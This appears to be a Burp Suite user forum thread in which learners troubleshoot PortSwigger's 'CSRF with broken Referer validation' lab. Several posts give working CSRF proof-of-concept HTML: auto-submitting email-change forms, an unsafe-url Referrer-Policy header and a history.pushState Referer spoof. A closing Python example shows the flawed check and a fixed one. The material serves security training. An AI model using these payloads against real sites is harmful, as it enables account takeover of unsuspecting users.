
Burp Suite User Forum


Can't pass the "CSRF with broken Referer validation" lab even if my solution works

Darius | Last updated: Dec 08, 2023 10:48PM UTC

Lab-URL: https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses/lab-referer-validation-broken

I found a solution that works when I tested with `wiener:peter`, but it doesn't get accepted when I deliver the exploit to the victim.

Steps:

1. In the Exploit Server, set file to /exploit?LAB_URL.web-security-academy.net
2. Add the correct header: Referrer-Policy: unsafe-url
3. Add this body:

```html
<html>
<body>
<form action="https://LAB_URL.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

----

After I store and view the exploit, the email will be changed to "pwned@evil-user.net". But when I deliver the exploit, the solution doesn't get accepted. What should I change? Thank you!

Darius | Last updated: Dec 08, 2023 10:52PM UTC

Update: I looked into the solution and included the `history.pushState` JS and set the exploit file to just "/exploit". The exploit works, but when delivering it, the solution is still not approved.

Dominyque, PortSwigger Agent | Last updated: Dec 11, 2023 10:02AM UTC

Hi Darius, I have just tested the lab with the steps you have outlined and can confirm that the lab solves. Are you able to send a screen recording to support@portswigger.net so we can see the exact steps you are taking?

Darius | Last updated: Dec 11, 2023 06:50PM UTC

Hi Dominyque, Thanks for your reply. I just tried again and it was working in the end. Thank you!

Dominyque, PortSwigger Agent | Last updated: Dec 12, 2023 07:34AM UTC

Hi Darius, I am glad you were able to solve the lab! :)

Yuyu | Last updated: Jul 29, 2024 05:51PM UTC

HEAD

```
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Referrer-Policy: unsafe-url
```

BODY

```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>
history.pushState("", "", "?/0ae400270447f3468213256900ae00b8.web-security-academy.net");
</script>
<form action="https://0ae400270447f3468213256900ae00b8.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker10&#64;test&#46;com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

The view exploit is working but when delivering to the victim, it can't solve the lab. Could you advise please?

Dominyque, PortSwigger Agent | Last updated: Jul 30, 2024 08:02AM UTC

Hi Loke, Which browser are you attempting the lab on? The Embedded browser?

James | Last updated: Oct 08, 2024 01:00AM UTC

I cannot get the lab to solve. I tried to look up several YouTube walkthroughs for it as well that come up with the same results, but when I click to deliver it never solves. This is the only lab I have had this issue with.

URL: https://exploit-0a79003f04c2fc99cf7181c801f7000a.exploit-server.net/exploit
HTTPS: Yes
File: /exploit

Head:

```
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Referrer-policy: unsafe-url
```

Body:

```html
<html>
<body>
<form action="https://0a97006e0495fce8cf5d8298006800f8.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test2&#64;exploit&#46;net" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState(", ", '/?0a97006e0495fce8cf5d8298006800f8.web-security-academy.net');
document.forms[0].submit();
</script>
</body>
</html>
```

Using Chrome browser. Thanks

James | Last updated: Oct 08, 2024 01:03AM UTC

Cancel, after making this post I figured out where I made a mistake in history push: I had `(", ", '/')` and I needed `('', '', '/')`.
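The server-side check that the `history.pushState` trick in these posts defeats, as an added example (not code from the lab or from any poster in this thread): assuming the lab's server only tests whether its own hostname appears anywhere in the Referer string, this Python shows that substring check beside a fixed version that parses the URL and compares the host exactly. The hostnames and the sample Referer values are constructed placeholders.

```python
from urllib.parse import urlsplit

# Constructed samples (placeholder hostnames). SPOOFED_REFERER is what a
# victim's browser sends after the exploit page rewrites its own URL with
# history.pushState() and serves Referrer-Policy: unsafe-url.
EXPECTED_HOST = "lab-id.web-security-academy.net"
SPOOFED_REFERER = (
    "https://exploit-lab-id.exploit-server.net/"
    "?/lab-id.web-security-academy.net"
)
GENUINE_REFERER = "https://lab-id.web-security-academy.net/my-account"


def referer_ok_broken(referer, expected_host=EXPECTED_HOST):
    """Substring check, the pattern the lab's 'broken validation' implies.
    Any origin passes it by placing the hostname in the path or query."""
    return referer is not None and expected_host in referer


def referer_ok_fixed(referer, expected_host=EXPECTED_HOST):
    """Parse the URL and compare scheme and hostname exactly.
    A missing Referer is rejected (fail closed). urlsplit().hostname strips
    any userinfo and port, so 'https://expected@evil.example/' resolves to
    evil.example rather than matching on the raw string."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return parts.scheme == "https" and parts.hostname == expected_host


def change_email_allowed(headers, expected_host=EXPECTED_HOST):
    """Gate the state-changing request on the fixed Referer check.
    A real application should also require a per-session CSRF token;
    this only shows the header check the lab is about."""
    return referer_ok_fixed(headers.get("Referer"), expected_host)


if __name__ == "__main__":
    for label, ref in (("spoofed", SPOOFED_REFERER), ("genuine", GENUINE_REFERER)):
        print(label, "broken:", referer_ok_broken(ref), "fixed:", referer_ok_fixed(ref))
```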
